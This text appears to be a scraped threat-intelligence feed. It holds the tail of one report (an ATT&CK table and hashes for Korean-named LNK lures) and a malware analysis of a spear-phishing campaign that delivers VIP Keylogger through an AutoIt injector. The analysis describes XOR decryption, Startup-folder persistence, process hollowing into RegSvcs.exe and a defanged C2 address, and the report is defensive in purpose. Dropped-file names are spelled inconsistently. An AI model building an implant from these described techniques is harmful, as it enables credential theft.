Persistence	T1574.001	Hijack Execution Flow: DLL
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation	T1055.001	Process Injection: Dynamic-link Library Injection
	T1055.009	Process Injection: Proc Memory
	T1053.005	Scheduled Task/Job : Scheduled Task
Defense Evasion	T1140	Deobfuscate/Decode Files or Information
	T1070.004	Indicator Removal : File Deletion
	T1027.009	Obfuscated Files or Information: Embedded Payloads
	T1027.013	Obfuscated Files or Information: Encrypted/Encoded File
Credential Access	T1056.002	Input Capture: Keylogging : GUI Input Capture
Discovery	T1087.001	Account Discovery : Local Account
	T1217	Browser Information Discovery
	T1083	File and Directory Discovery
	T1082	System Information Discovery
Collection	T1123	Audio Capture
	T1005	Data from Local System
	T1113	Screen Capture
Command and Control	T1102.002	Web Service: Bidirectional Communication
Exfiltration	T1041	Exfiltration Over C2 Channel
Impact	T1529	System Shutdown/Reboot

IOCs:

MD5	File Name
1aec7b1227060a987d5cb6f17782e76e	aio02.dat
591b2aaf1732c8a656b5c602875cbdd9	aio03.bat
d035135e190fb6121faa7630e4a45eed	aio01.dat
cc1522fb2121cf4ae57278921a5965da	*.Zip
2dc20d55d248e8a99afbe5edaae5d2fc	tony31.dat
f34fa3d0329642615c17061e252c6afe	tony32.dat
051517b5b685116c2f4f1e6b535eb4cb	tony33.bat
da05d6ab72290ca064916324cbc86bab	*.LNK
443a00feeb3beaea02b2fbcd4302a3c9	북한이탈주민의 성공적인 남한정착을 위한 아카데미 운영.lnk
f6d72abf9ca654a20bbaf23ea1c10a55	국가정보와 방첩 원고.lnk

Authors:

Dixit Panchal
Kartik Jivani
Soumen Burma

Source link

سپتامبر 1, 2025

Spear Phishing Campaign Delivers VIP Keylogger via Email Attachment

Introduction

Earlier this year, we published a white paper detailing the VIP keylogger, a sophisticated malware strain leveraging spear-phishing and steganography to infiltrate victims’ systems. The keylogger is known for its data theft capabilities, particularly targeting web browsers and user credentials.

In a recently identified campaign, the threat actors have once again employed spear-phishing tactics to distribute the malware. However, unlike the previous iteration, this campaign uses an Auto-It-based injector to deploy the final payload VIP keylogger.

The malware is typically delivered through phishing emails containing malicious attachments or embedded links. Once executed, it installs the VIP keylogger, which is specifically designed to steal sensitive information by logging keystrokes, capturing credentials from widely used web browsers like Chrome, MS Edge, and Mozilla, and monitoring clipboard activity.

In this campaign, the AutoIt script is utilized to deliver and execute the malicious payload. Threat actors often leverage AutoIt due to its ease of obfuscation and ability to compile scripts into executables, which evade traditional AV solutions.

Infection chain and Process tree:

The campaign begins with a spear-phishing email carrying a ZIP file named “payment receipt_USD 86,780.00.pdf.pdf.z.”. This archive contains a malicious executable disguised as “payment receipt_USD 86,780.00 pdf.exe”, tricking users into believing it’s a harmless document. Once executed, the executable runs an embedded AutoIt script and drops two encrypted files leucoryx and avenes into the temp folder. These files are decrypted at runtime, and the final payload, VIP Keylogger, is injected into RegSvcs.exe using process hollowing techniques, as shown in the figures below.

Fig.: Process Tree

Infiltration:

The campaign begins with a spear-phishing email carrying a ZIP file named “payment receipt_USD 86,780.00 pdf.pdf.z.” This archive contains a malicious executable disguised as “payment receipt_USD 86,780.00 pdf.exe,” tricking users into thinking it’s a harmless document. Once executed, the embedded AutoIt script runs and drops the VIP Keylogger onto the system, as shown in the images below.

Zip Attachments which further contains the executable.

During execution, two files named leucorynx and aveness are dropped in the system’s Temp directory, as shown in the figure below.

AutoIt Script:

This AutoIt script decrypts and executes the dropped payload in memory. It first checks the encrypted file leucoryx in the temp directory, reads its content, and decrypts it using a custom XOR function (KHIXTKVLO). The decrypted data is stored in a memory structure.
It retrieves the pointer to the decrypted payload and uses DllCall to allocate executable memory and copy the payload into the allocated memory. A second DllCall triggers the execution and runs the payload in the memory.

The leucorynx contains the key to the decode file, as shown in the figure below.

The malware drops a .vbs script in the Startup folder to maintain persistence. This script executes the primary payload located in the “AppData\Local” directory.
The VB script ensures that the payload (definitiveness.exe) located in the “AppData\Local\Dunlop” directory is executed every time the user logs in, it to operate silently in the background after each reboot.

The dropped file avness is loaded into memory, as shown in the figures below. Once loaded, its contents are passed to a custom decryption routine, which is responsible for unpacking or decoding the embedded payload.

The figure below Shows the decryption function, which is takes the address of the encrypted payload and the XOR key as arguments.

The figure below highlights the decryption loop, where the payload is iteratively decoded. The memory dump shows the decrypted content of the payload.

Decrypted payload is .NET VIP keylogger;

Process Hollowing:

The figure below demonstrates the use of process hollowing, where RegSvcs.exe is spawned in a suspended state using CreateProcess. This enables the malware to unmap the original code and inject its own payload into the process memory before resuming execution.

As shown in the figures below, the decrypted payload is mapped into the address space of regsvc.exe. The memory dump has strings associated with the payload.

Payload: VIP Keylogger

The final payload delivered in this campaign is VIP Keylogger, for which we have already provided a comprehensive analysis of its functionality, capabilities, and behaviour in our technical paper on VIP Keylogger.

IOCs:

MD5	Filename
F0AD3189FE9076DDD632D304E6BEE9E8	payment receipt_USD 86,780.00 pdf.exe
0B0AE173FABFCE0C5FBA521D71895726	VIP Keylogger
Domain/IP
hxxp[:]//51.38.247.67:8081

Protection:

Trojan.AgentCiR

Trojan.YakbeexMSIL.ZZ4

MITRE ATT&CK:

Tactic	Technique ID	Name
Obfuscation	T1027	Obfuscated Files or Information
Execution	T1204.002
Execution	T1059.006	Command and Scripting Interpreter: Python
Screen Capture	T1113	Screen Capture
Gather Victim Host Information	T1592	Collects system info
Input Capture	T1056	Keylogging
Defense Evasion	T1055.002	Process Injection: Portable Executable Injection
Content Injection	T1659	Injecting malicious code into systems
Command and Control	T1071.001	Application Layer Protocol: Web Protocols

Author:

Vaibhav Billade

Rumana Siddiqui

Source link

جولای 29, 2025